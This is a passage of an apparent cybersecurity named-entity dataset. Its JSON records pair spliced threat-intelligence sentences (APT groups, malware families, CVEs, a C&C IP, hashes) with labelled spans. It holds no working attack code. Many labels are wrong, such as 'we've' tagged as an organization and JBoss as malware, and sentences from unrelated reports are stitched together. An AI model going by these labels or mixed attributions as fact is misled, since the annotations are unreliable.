campaign in 2014 . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . 
Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user . In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . 
DoNot Team’s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February .", "spans": {"ORGANIZATION: Wh1sks": [[11, 17]], "THREAT_ACTOR: Shadow Brokers'": [[101, 116]], "FILEPATH: installed EXE file": [[144, 162]], "TOOL: DLL": [[197, 200]], "FILEPATH: Bisonal variant": [[212, 227]], "TOOL: C2": [[356, 358]], "MALWARE: dropper": [[513, 520]], "ORGANIZATION: Talos": [[616, 621]], "FILEPATH: DriverInstallerU.exe”": [[735, 756]], "FILEPATH: Interenet Assistant.exe”": [[806, 830]], "THREAT_ACTOR: attackers": [[919, 928], [1270, 1279]], "ORGANIZATION: victims who answer": [[938, 956]], "FILEPATH: BMW_x1”": [[1212, 1219]], "FILEPATH: BMW_x2”": [[1222, 1229]], "FILEPATH: BMW_x8”": [[1240, 1247]], "THREAT_ACTOR: unknown actors": [[1610, 1624]], "ORGANIZATION: Kaspersky": [[1701, 1710], [2527, 2536]], "THREAT_ACTOR: BlackEnergy": [[1822, 1833], [2256, 2267], [2298, 2309], [2566, 2577]], "MALWARE: Trojan": [[1896, 1902]], "ORGANIZATION: Cys Centrum": [[2109, 2120]], "THREAT_ACTOR: Buhtrap": [[2657, 2664], [2982, 2989], [3070, 3077], [3310, 3317], [3427, 3434], [3529, 3536], [4453, 4460]], "ORGANIZATION: we've": [[2842, 2847]], "THREAT_ACTOR: this group": [[2853, 2863]], "VULNERABILITY: exploit": [[3113, 3120]], "VULNERABILITY: CVE-2019-1132": [[3123, 3136]], "ORGANIZATION: businesses": [[3342, 3352], [3449, 3459]], "ORGANIZATION: banks": [[3357, 3362]], "ORGANIZATION: governmental institutions": [[3394, 3419]], "ORGANIZATION: financial institutions": [[3578, 3600]], "THREAT_ACTOR: group's": [[3727, 3734]], "ORGANIZATION: FinCERT": [[3842, 3849]], "THREAT_ACTOR: DarkHydrus": [[3991, 4001], [4087, 4097], [4347, 4357]], "ORGANIZATION: Palo Alto": [[4067, 4076]], "ORGANIZATION: governments": [[4141, 4152]], "VULNERABILITY: CVE-2018-8414": [[4244, 4257]], "ORGANIZATION: welivesecurity": [[4406, 4420]], "THREAT_ACTOR: 'darkhydrus'": [[4489, 4501]], "THREAT_ACTOR: 
‘Williams’": [[4521, 4531]], "ORGANIZATION: Twitter user": [[4568, 4580]], "THREAT_ACTOR: Dark Hydruns": [[4609, 4621]], "MALWARE: Office VBA macro": [[4636, 4652]], "ORGANIZATION: ASERT": [[4731, 4736], [5213, 5218]], "THREAT_ACTOR: LUCKY ELEPHANT": [[4783, 4797], [4972, 4986]], "ORGANIZATION: foreign government": [[4856, 4874]], "ORGANIZATION: telecommunications": [[4877, 4895]], "ORGANIZATION: military": [[4902, 4910]], "ORGANIZATION: South Asian government websites": [[5021, 5052]], "ORGANIZATION: Microsoft Outlook": [[5064, 5081]], "TOOL: emails": [[5257, 5263]], "THREAT_ACTOR: Indian APT group": [[5661, 5677]], "THREAT_ACTOR: DoNot Team": [[5839, 5849]], "ORGANIZATION: Pakistani businessmen": [[6058, 6079]], "THREAT_ACTOR: DoNot": [[6099, 6104]]}, "info": {"id": "cyberner_stix_train_001642", "source": "cyberner_stix_train"}} {"text": "The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In 2005 , the Chinese government passed an “ anti-secession ” law that signified its intention to use “ non-peaceful ” means to stymie any Taiwanese attempt to secede from China . 
While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": {"TOOL: NetTraveler": [[156, 167]], "VULNERABILITY: CVE-2012-0158": [[189, 202]], "TOOL: NetTraveler Trojan": [[218, 236]], "ORGANIZATION: Chinese government": [[253, 271]], "ORGANIZATION: CISA": [[425, 429]], "ORGANIZATION: Microsoft": [[433, 442]], "ORGANIZATION: CISA report": [[520, 531]]}, "info": {"id": "cyberner_stix_train_001643", "source": "cyberner_stix_train"}} {"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . It was a targeted attack we are calling \" Machete \" .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: military": [[92, 100]], "ORGANIZATION: organizations": [[101, 114]]}, "info": {"id": "cyberner_stix_train_001644", "source": "cyberner_stix_train"}} {"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"MALWARE: PICKPOCKET": [[0, 10]], "FILEPATH: Backdoor.Nidiran": [[253, 269]]}, "info": {"id": "cyberner_stix_train_001645", "source": "cyberner_stix_train"}} {"text": "Office 365 ATP sandbox employs special mechanisms to avoid being detected by similar checks . APT32 poses a threat to companies doing business or preparing to invest in Vietnam . The .png cover file is actually a valid image file that is not malicious on its own . 
This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": {"SYSTEM: Office 365 ATP": [[0, 14]], "THREAT_ACTOR: APT32": [[94, 99]]}, "info": {"id": "cyberner_stix_train_001646", "source": "cyberner_stix_train"}} {"text": "Although the current target list is limited to Spanish apps , it seems that the actor is taking into account that the bot should also be able to target other countries , seeing that the path used in the inject requests contains the country code of the targeted institution . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . We also identified another malware family , HomamDownloader , sharing some servers with Daserf .", "spans": {"TOOL: Visma": [[341, 346]], "THREAT_ACTOR: APT10": [[403, 408]], "TOOL: 1.bat": [[444, 449]], "TOOL: cu.exe": [[452, 458]], "TOOL: ss.rar": [[461, 467]], "TOOL: r.exe": [[470, 475]], "TOOL: pd.exe": [[478, 484]], "MALWARE: HomamDownloader": [[531, 546]], "MALWARE: Daserf": [[575, 581]]}, "info": {"id": "cyberner_stix_train_001647", "source": "cyberner_stix_train"}} {"text": "Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . 
In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2011-3544": [[204, 217]], "MALWARE: HTTPBrowser backdoor": [[285, 305]], "VULNERABILITY: CVE-2010-0738": [[312, 325]], "MALWARE: JBoss": [[347, 352]], "VULNERABILITY: exploit": [[453, 460]]}, "info": {"id": "cyberner_stix_train_001648", "source": "cyberner_stix_train"}} {"text": "The attack On March 24th , 2013 , the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal .", "spans": {"TOOL: PIVY": [[179, 183]], "VULNERABILITY: zero-day exploit": [[205, 221]], "THREAT_ACTOR: attackers": [[382, 391]], "ORGANIZATION: government agencies": [[454, 473]], "ORGANIZATION: civil and military organizations": [[478, 510]]}, "info": {"id": "cyberner_stix_train_001649", "source": "cyberner_stix_train"}} {"text": "] me under names in the format : photo_ [ number ] _img.apk , mms_ [ number ] _img.apk avito_ [ number ] .apk , mms.img_ [ number ] _photo.apk , mms [ number ] _photo.image.apk , mms [ number ] _photo.img.apk , mms.img.photo_ [ number ] .apk , photo_ [ number ] _obmen.img.apk . The threat actors create PlugX DLL stub loaders that will run only after a specific date . S-SHA2init2 . 
To continue the home security analogy , if the window was nt left open , the attacker would likely have gone somewhere else , and the same principle applies in the digital world .", "spans": {"TOOL: PlugX DLL": [[304, 313]], "FILEPATH: S-SHA2init2": [[370, 381]], "THREAT_ACTOR: attacker": [[461, 469]]}, "info": {"id": "cyberner_stix_train_001650", "source": "cyberner_stix_train"}} {"text": "This simple measure prevents the Trojan from running and being analyzed in dynamic analysis environments ( sandboxes ) and on the test devices of malware analysts . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B .", "spans": {"ORGANIZATION: report": [[170, 176]], "THREAT_ACTOR: SectorJ04": [[238, 247], [374, 383]], "THREAT_ACTOR: Cadelle": [[428, 435]], "MALWARE: Backdoor.Cadelspy": [[443, 460]], "THREAT_ACTOR: Chafer": [[499, 505]], "MALWARE: Backdoor.Remexi": [[513, 528]], "MALWARE: Backdoor.Remexi.B": [[533, 550]]}, "info": {"id": "cyberner_stix_train_001651", "source": "cyberner_stix_train"}} {"text": "mcpef.apk ( SHA256 : a8e7dfac00adf661d371ac52bddc03b543bd6b7aa41314b255e53d810931ceac ) : The malicious system application downloaded from server ( package name – com.android.music.helper ) . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . 
However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups .", "spans": {"VULNERABILITY: CVE-2015-2546": [[200, 213]], "THREAT_ACTOR: attackers": [[360, 369]], "ORGANIZATION: FireEye": [[382, 389]], "THREAT_ACTOR: Moafee": [[479, 485]], "THREAT_ACTOR: DragonOK groups": [[490, 505]]}, "info": {"id": "cyberner_stix_train_001652", "source": "cyberner_stix_train"}} {"text": "The names of the files and their content play a major part in luring victims to open them , as they usually relate to current topics pertaining to Hamas , the Palestinian National Authority , or other recent events in the Middle East .", "spans": {"ORGANIZATION: Hamas": [[147, 152]]}, "info": {"id": "cyberner_stix_train_001653", "source": "cyberner_stix_train"}} {"text": "Specifically , the app was an Android Package ( APK ) file that will be discussed in more detail shortly . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . 
The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai .", "spans": {"SYSTEM: Android Package": [[30, 45]], "MALWARE: KopiLuwak": [[128, 137]], "THREAT_ACTOR: APT1": [[310, 314]]}, "info": {"id": "cyberner_stix_train_001654", "source": "cyberner_stix_train"}} {"text": "The code contains multiple comments in Italian , here is the most noteworthy example : “ Receive commands from the remote server , here you can set the key commands to command the virus ” Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python ’ s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . 
FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information .", "spans": {"SYSTEM: Python": [[338, 344]], "THREAT_ACTOR: ‘Operation Sheep’": [[565, 582]], "VULNERABILITY: Man-in-the-Disk": [[681, 696]], "THREAT_ACTOR: FIN5": [[764, 768]]}, "info": {"id": "cyberner_stix_train_001655", "source": "cyberner_stix_train"}} {"text": "Collect information about the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_001656", "source": "cyberner_stix_train"}} {"text": "However , we were able to successfully analyze Suckfly malware samples and extract some of the communications between the Nidiran back door and the Suckfly command and control ( C&C ) domains .", "spans": {"THREAT_ACTOR: Suckfly": [[47, 54], [148, 155]], "MALWARE: Nidiran": [[122, 129]], "TOOL: command and control": [[156, 175]], "TOOL: C&C": [[178, 181]]}, "info": {"id": "cyberner_stix_train_001657", "source": "cyberner_stix_train"}} {"text": "We came across the names Photo , Message , Avito Offer , and MMS Message . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations . Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection . “ It appears to be the email address Will used for his profiles , ” the IT director replied .", "spans": {"ORGANIZATION: CTU": [[75, 78]], "THREAT_ACTOR: TG-3390": [[109, 116]], "ORGANIZATION: compromising organizations": [[159, 185]], "THREAT_ACTOR: Will": [[351, 355]], "ORGANIZATION: IT director": [[386, 397]]}, "info": {"id": "cyberner_stix_train_001658", "source": "cyberner_stix_train"}} {"text": "It enables the bot to stream screenshots and send them to the C2 so that actors can see what is happening on the screen of the infected device . 
This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China’s civilian human intelligence agency . One of the Minzen samples ( SHA256 : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 ) found in the Republic of Korea in December 2016 installs simple backdoor module as a final payload on a compromised computer .", "spans": {"THREAT_ACTOR: APT10": [[190, 195]], "MALWARE: Minzen": [[353, 359]], "FILEPATH: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[379, 443]]}, "info": {"id": "cyberner_stix_train_001659", "source": "cyberner_stix_train"}} {"text": "The encryption key is different from the one used for sending stolen data via HTTP . Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus . The new GRIFFON implant is written to the hard drive before each execution , limiting the “ file-less ” aspect of this method . Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": {"MALWARE: GRIFFON": [[194, 201]], "TOOL: Greatness": [[314, 323]], "SYSTEM: IP filtering": [[452, 464]], "SYSTEM: Telegram bots": [[486, 499]]}, "info": {"id": "cyberner_stix_train_001660", "source": "cyberner_stix_train"}} {"text": "The spaghetti code in FinFisher dropper This problem is not novel , and in common situations there are known reversing plugins that may help for this task . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . This is , however , only for appearance because the real size or the PE file is between 63 KB and 72 KB , depending on the version . 
That makes highfidelity threat intelligence and a proactive security stance critically important to success in 2023 .", "spans": {"MALWARE: FinFisher": [[22, 31]], "THREAT_ACTOR: actors": [[161, 167]], "VULNERABILITY: CVE-2014-6332": [[189, 202]], "TOOL: Emissary": [[301, 309]]}, "info": {"id": "cyberner_stix_train_001661", "source": "cyberner_stix_train"}} {"text": "The Trojan requests Device Administrator rights The Trojan requests permission to use AccessibilityService After installation , the Trojan starts communicating with the cybercriminals ’ C & C server . CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware . The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization . Anonymous Sudan has targeted organizations associated with infrastructure and key services , including in government and private sectors .", "spans": {"ORGANIZATION: CTU": [[201, 204]], "THREAT_ACTOR: TG-3390": [[231, 238]], "MALWARE: Shellbot": [[468, 476]], "SYSTEM: Unix-": [[554, 559]], "SYSTEM: Linux-based systems": [[564, 583]], "THREAT_ACTOR: Anonymous Sudan": [[638, 653]], "ORGANIZATION: organizations associated with infrastructure": [[667, 711]], "ORGANIZATION: key services": [[716, 728]], "ORGANIZATION: government": [[744, 754]], "ORGANIZATION: private sectors": [[759, 774]]}, "info": {"id": "cyberner_stix_train_001662", "source": "cyberner_stix_train"}} {"text": "But Dvmap is very special rooting malware . In 2015 , the Metel gang began to target banks and financial institutions directly . It monitors whether the user is browsing the web page . 
On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": {"MALWARE: Dvmap": [[4, 9]], "ORGANIZATION: banks": [[85, 90]], "ORGANIZATION: financial institutions": [[95, 117]], "MALWARE: blackout": [[244, 252]]}, "info": {"id": "cyberner_stix_train_001663", "source": "cyberner_stix_train"}} {"text": "Audit existing firewall rules and close all ports that are not explicitly needed for business .", "spans": {"TOOL: firewall": [[15, 23]]}, "info": {"id": "cyberner_stix_train_001664", "source": "cyberner_stix_train"}} {"text": "] ponethus [ . Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software . Some of the names the attackers used for it include : Adobe Assistant , Migrated . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"ORGANIZATION: security industry": [[71, 88]], "ORGANIZATION: banks": [[123, 128]], "TOOL: Adobe Assistant": [[300, 315]], "TOOL: Migrated": [[318, 326]]}, "info": {"id": "cyberner_stix_train_001665", "source": "cyberner_stix_train"}} {"text": "The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts .", "spans": {"ORGANIZATION: The Center for Applied Research": [[0, 31]]}, "info": {"id": "cyberner_stix_train_001666", "source": "cyberner_stix_train"}} {"text": ". In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . 
SecureWorks® Counter Threat Unit™ ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"MALWARE: SWAnalytics’": [[25, 37]], "ORGANIZATION: SecureWorks® Counter Threat Unit™": [[207, 240]], "ORGANIZATION: CTU": [[243, 246]], "ORGANIZATION: organization": [[321, 333]]}, "info": {"id": "cyberner_stix_train_001667", "source": "cyberner_stix_train"}} {"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . Patchwork uses email as an entry point , which is why securing the email gateACT is important .", "spans": {"MALWARE: Trojan": [[33, 39]], "THREAT_ACTOR: Patchwork": [[128, 137]]}, "info": {"id": "cyberner_stix_train_001668", "source": "cyberner_stix_train"}} {"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery .", "spans": {"MALWARE: CONFUCIUS_B": [[4, 15]], "TOOL: RTLO": [[104, 108]]}, "info": {"id": "cyberner_stix_train_001669", "source": "cyberner_stix_train"}} {"text": "EventBot is a mobile banking trojan and infostealer that abuses Android ’ s accessibility features to steal user data from financial applications , read user SMS messages , and steal SMS messages to allow the malware to bypass two-factor authentication . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . 
The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China .", "spans": {"MALWARE: EventBot": [[0, 8]], "SYSTEM: Android": [[64, 71]], "MALWARE: botnet encompassed": [[318, 336]], "ORGANIZATION: financial institutions": [[411, 433]], "THREAT_ACTOR: actor": [[478, 483], [598, 603]]}, "info": {"id": "cyberner_stix_train_001670", "source": "cyberner_stix_train"}} {"text": "While there is not yet a patch available for the Windows vulnerability , updating Adobe Flash to the latest version will render this in-the-wild exploit innocuous .", "spans": {"SYSTEM: Windows": [[49, 56]], "TOOL: Adobe Flash": [[82, 93]]}, "info": {"id": "cyberner_stix_train_001671", "source": "cyberner_stix_train"}} {"text": "Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired .", "spans": {}, "info": {"id": "cyberner_stix_train_001672", "source": "cyberner_stix_train"}} {"text": "Furthermore , there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations . 
In the latest attack , Donot group is targeting Pakistani businessman working in China", "spans": {"THREAT_ACTOR: APT32": [[41, 46]], "ORGANIZATION: security": [[87, 95]], "ORGANIZATION: technology": [[100, 110]], "THREAT_ACTOR: Donot group": [[164, 175]], "ORGANIZATION: Pakistani businessman": [[189, 210]]}, "info": {"id": "cyberner_stix_train_001673", "source": "cyberner_stix_train"}} {"text": "By researching historical data relevant to C&C 176.31.112.10 , we discovered that on February 16th 2015 , the server was sharing an SSL certificate with another IP address allocated to CrookServers and also hosted at OVH : 213.251.187.145 .", "spans": {"TOOL: C&C": [[43, 46]], "IP_ADDRESS: 176.31.112.10": [[47, 60]], "ORGANIZATION: CrookServers": [[185, 197]], "TOOL: OVH": [[217, 220]], "IP_ADDRESS: 213.251.187.145": [[223, 238]]}, "info": {"id": "cyberner_stix_train_001674", "source": "cyberner_stix_train"}} {"text": "The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners .", "spans": {}, "info": {"id": "cyberner_stix_train_001675", "source": "cyberner_stix_train"}} {"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . 
Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed .", "spans": {"MALWARE: DoublePulsar": [[0, 12]]}, "info": {"id": "cyberner_stix_train_001676", "source": "cyberner_stix_train"}} {"text": "Once successfully executed , the macro will install a payload and save a document to the system .", "spans": {"TOOL: macro": [[33, 38]]}, "info": {"id": "cyberner_stix_train_001677", "source": "cyberner_stix_train"}} {"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . The structure of the fake App Store matches the application bundle structure and provides both English and German interfaces .", "spans": {"TOOL: App Store": [[199, 208]]}, "info": {"id": "cyberner_stix_train_001678", "source": "cyberner_stix_train"}} {"text": "The stolen data is copied into a hidden directory as “ %MYPICTURES%\\%volume serial number% “ , from where it can be exfiltrated by the attackers using one of the AZZY implants .", "spans": {"MALWARE: AZZY": [[162, 166]]}, "info": {"id": "cyberner_stix_train_001679", "source": "cyberner_stix_train"}} {"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . 
com .", "spans": {}, "info": {"id": "cyberner_stix_train_001680", "source": "cyberner_stix_train"}} {"text": "CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001681", "source": "cyberner_stix_train"}} {"text": "Upon reviewing the traffic from these IP S-PROT addresses , system owners may find that some traffic corresponds to malicious activity and some to legitimate activity .", "spans": {"TOOL: IP S-PROT addresses": [[38, 57]], "TOOL: system": [[60, 66]]}, "info": {"id": "cyberner_stix_train_001682", "source": "cyberner_stix_train"}} {"text": "The sux library appears to be a customized super user ( su ) tool that includes code from the com.koushikdutta.superuser app and carries the equivalent of a super user ( su ) binary in order to run privileged commands on the system . Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan .", "spans": {"THREAT_ACTOR: APT41": [[275, 280]], "MALWARE: JHUHUGIT": [[446, 454]], "MALWARE: JKEYSKW": [[479, 486]], "MALWARE: AZZY Trojan": [[654, 665]]}, "info": {"id": "cyberner_stix_train_001683", "source": "cyberner_stix_train"}} {"text": "Users of iOS can remove the malicious profile using the Apple Configurator 2 , Apple ’ s official iOS helper app for managing Apple devices . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election . The text mode sender uses the same hardcoded transaction ID 0xa4a3; however, instead of sending queries for TXT resource records, the malware uses A resource . Rhysida will enumerate through directories and files in directories starting from “ A : ” to “ Z : ” drives , ensure they ’re missing from the “ exclude list ” and then “ process , ” i.e. , encrypt the files .", "spans": {"SYSTEM: iOS": [[9, 12], [98, 101]], "ORGANIZATION: Apple": [[56, 61], [79, 84], [126, 131]], "ORGANIZATION: military": [[268, 276]], "ORGANIZATION: government personnel": [[281, 301]], "ORGANIZATION: defense": [[354, 361]], "ORGANIZATION: government": [[366, 376]], "ORGANIZATION: authors": [[396, 403]], "ORGANIZATION: journalists": [[408, 419]], "MALWARE: Rhysida": [[681, 688]]}, "info": {"id": "cyberner_stix_train_001684", "source": "cyberner_stix_train"}} {"text": "] infogoogle-support-team [ . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group . In fact , Shanghai was listed as the registrant ’s city in at least 24 of the 107 ( 22% ) registrations . Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Kurdish activists": [[151, 168]], "THREAT_ACTOR: Flying Kitten actor group": [[213, 238]]}, "info": {"id": "cyberner_stix_train_001685", "source": "cyberner_stix_train"}} {"text": "Method onPostExecute : to handle instructions from remote C2 Figure 6 shows an example response sent back from one C2 server . 
In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware . The attackers put great effort to carefully select the targets located in specific countries based on the victim 's keyboard layout . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": {"ORGANIZATION: banks": [[207, 212]], "TOOL: POWBAT malware": [[289, 303]], "ORGANIZATION: governmental organizations": [[511, 537]], "ORGANIZATION: political groups": [[540, 556]], "ORGANIZATION: think tanks": [[561, 572]], "ORGANIZATION: various individuals involved in defense and geopolitical related research": [[586, 659]]}, "info": {"id": "cyberner_stix_train_001686", "source": "cyberner_stix_train"}} {"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date .", "spans": {"ORGANIZATION: Symantec": [[153, 161]]}, "info": {"id": "cyberner_stix_train_001687", "source": "cyberner_stix_train"}} {"text": "They also included Dynamic Data Exchange ( DDE ) and Windows Script Component ( SCT ) abuse to their tactics , as well as started exploiting recently reported vulnerabilities . 
For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same ACT .", "spans": {"MALWARE: Vietnamese backdoor": [[222, 241]]}, "info": {"id": "cyberner_stix_train_001688", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT also uses widely available or modified open-source tools , which could be a strategic effort to reduce the risk of attribution or to minimize the need for tool development resources .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]]}, "info": {"id": "cyberner_stix_train_001689", "source": "cyberner_stix_train"}} {"text": "Indian government org #2 is responsible for implementing network software for different ministries and departments within India 's central government .", "spans": {}, "info": {"id": "cyberner_stix_train_001690", "source": "cyberner_stix_train"}} {"text": "The choice of a particular payload is determined by the implant ’ s version , and it can be downloaded from the command and control ( C & C ) server soon after the implant starts , or after a specific command . OceanLotus malware family samples used no earlier than 2017 . TA505 is a financially motivated threat group that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: OceanLotus": [[211, 221]], "THREAT_ACTOR: TA505": [[273, 278]]}, "info": {"id": "cyberner_stix_train_001691", "source": "cyberner_stix_train"}} {"text": "There are previous reports of threat actors including APT10 and APT1 using dynamic DNS . 
Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"THREAT_ACTOR: threat actors": [[30, 43]], "THREAT_ACTOR: APT10": [[54, 59]], "THREAT_ACTOR: APT1": [[64, 68]], "TOOL: dynamic DNS": [[75, 86]], "ORGANIZATION: Iranians": [[147, 155]]}, "info": {"id": "cyberner_stix_train_001692", "source": "cyberner_stix_train"}} {"text": "During our analysis of this sample , we did notice that the class itself is never called or used by the malware . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Additionally , the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure , as APT12 used the same strategy after compromising the New York Times in Oct 2012 . 
